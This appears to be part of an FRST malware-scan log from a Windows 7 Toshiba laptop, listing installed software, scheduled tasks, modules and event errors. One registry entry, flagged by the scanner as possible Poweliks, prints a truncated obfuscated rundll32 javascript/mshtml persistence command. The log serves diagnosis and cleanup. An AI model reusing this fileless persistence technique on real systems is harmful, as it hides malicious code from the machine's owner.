Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: 2.2.97 - LSI Corporation)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
07-09-2014 01:28:19 Windows 7 Service Pack 1
07-09-2014 11:17:53 Windows Update
08-09-2014 02:19:37 Windows Update
08-09-2014 11:25:59 Windows Update
09-09-2014 06:43:28 Installed Adblock Plus for IE (32-bit)
09-09-2014 06:56:14 Malwarebytes Anti-Rootkit Restore Point
09-09-2014 19:00:13 Windows Update
10-09-2014 11:39:30 Windows Update
11-09-2014 11:02:04 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:04 - 2009-06-11 05:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom 802.11n Network Adapter
Description: Broadcom 802.11n Network Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: BCM43XX
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x16b4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: regsvr32.exe, version: 6.1.7600.16385, time stamp: 0x4a5bca28
Faulting module name: ntdll.dll, version: 6.1.7600.16915, time stamp: 0x4ec49caf
Exception code: 0xc0000029
Fault offset: 0x0008df89
Faulting process id: 0x1688
Faulting application start time: 0xregsvr32.exe0
Faulting application path: regsvr32.exe1
Faulting module path: regsvr32.exe2
Report Id: regsvr32.exe3
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 6.1.7600.16768, time stamp: 0x4d6878c3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xffb4e0b3
Faulting process id: 0x8d0
Faulting application start time: 0xExplorer.EXE0
Faulting application path: Explorer.EXE1
Faulting module path: Explorer.EXE2
Report Id: Explorer.EXE3
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x594
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x15cc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x176c
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 05:45:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x11c4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 05:36:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x904
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/12/2014 03:13:04 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 01:11:09 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 00:45:43 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/12/2014 00:45:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084WSearch{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
 
Error: (09/12/2014 00:45:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}
 
Error: (09/12/2014 00:44:52 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084EventSystem{1BE1F766-5536-11D1-B726-00C04FB926AF}
 
Error: (09/12/2014 00:44:48 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\windows\System32\bcmihvsrv.dll
Error Code: 21
 
Error: (09/12/2014 00:44:41 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1084ShellHWDetection{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (09/12/2014 00:44:33 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
discache
MpFilter
spldr
